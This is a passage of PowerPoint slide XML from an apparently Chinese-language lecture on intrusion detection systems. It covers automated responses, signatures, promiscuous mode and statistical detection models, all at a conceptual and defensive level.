                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A3AE7D-7B8B-4DDA-99B3-239D5692CE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="1052513"/>
            <a:ext cx="626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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136197" name="Rectangle 1029">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4267F9-FBCE-484A-B34F-582396B73E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="79248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首先，可以通过重新配置路由器和防火墙，拒绝那些来自同一地址的信息流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>其次，通过在网络上发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>包切断连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>但是这两种方式都有问题，攻击者可以反过来利用重新配置的设备，其方法是：通过伪装成一个友方的地址来发动攻击，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>就会配置路由器和防火墙来拒绝这些地址，这样实际上就是对“自己人”拒绝服务了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>包的方法要求有一个活动的网络接口，这样它将置于攻击之下，一个补救的办法是：使活动网络接口位于防火墙内，或者使用专门的发包程序，从而避开标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>栈需求 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136198" name="Text Box 1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E12D2760-7E05-418D-A4DC-2D97D98C2ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="990600"/>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en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated Response</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Text Box 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780996FD-94EB-41A1-BE2C-E293663A10F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="9906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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219" name="Text Box 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C037C3-73AF-4D7C-934E-3777A479FF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="990600"/>
            <a:ext cx="6424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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137220" name="Text Box 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D60965C-AFD0-48B3-ABA0-947C4A860D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="1052513"/>
            <a:ext cx="626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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137221" name="Rectangle 1029">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC84EDF1-6079-4532-80F5-15E1E739B2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7924800"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lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的核心是攻击特征，它使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在事件发生时触发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>特征信息过短会经常触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，导致误报或错报，过长则会减慢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的工作速度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>有人将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>所支持的特征数视为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>好坏的标准，但是有的产商用一个特征涵盖许多攻击，而有些产商则会将这些特征单独列出，这就会给人一种印象，好像它包含了更多的特征，是更好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137222" name="Text Box 1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3446743-FB31-4496-95E0-DB7BAEF3517D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="990600"/>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en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Signatures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（特征） </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2" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01EFF69-1A19-44B7-A34A-A5F8E3910FEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="990600"/>
            <a:ext cx="7086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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E6EBF99-02FC-42A0-B3C7-3099206E3029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="990600"/>
            <a:ext cx="64246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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138244" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4A507F-D7A6-4C70-9E2A-0591C4E4F732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="1052513"/>
            <a:ext cx="6264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zh-CN" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138245" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{170699D9-142B-40F3-BBEB-F1B610925F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="990600"/>
            <a:ext cx="685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en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Promiscuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（混杂模式） </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138246" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D57A3A0-D0E1-47B5-9D80-C6475CCDE771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="76962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lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>默认状态下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>网络接口只能看到进出主机的信息，也就是所谓的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>non-promiscuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>（非混杂模式）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>如果网络接口是混杂模式，就可以看到网段中所有的网络通信量，不管其来源或目的地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>这对于网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是必要的，但同时可能被信息包嗅探器所利用来监控网络通信量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>交换型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以解决这个问题，在能看到全面通信量的地方，会都许多跨越（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）端口</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404BD32A-06D8-4F61-8E90-3AA606C397AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="6934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入侵方法</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入侵检测概述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   入侵检测方法与基本原理</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入侵检测响应机制</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入侵检测标准化工作</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口令管理</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4D99E680-6530-4D59-8DFD-E589AE7D6E0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="10668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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>入侵检测相关的数学模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F7D14B-53A9-4563-9C7A-FA240D82F38D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2133600"/>
            <a:ext cx="8534400"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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>试验模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Operational Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>平均值和标准差模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Mean and Standard Deviation Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>多变量模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
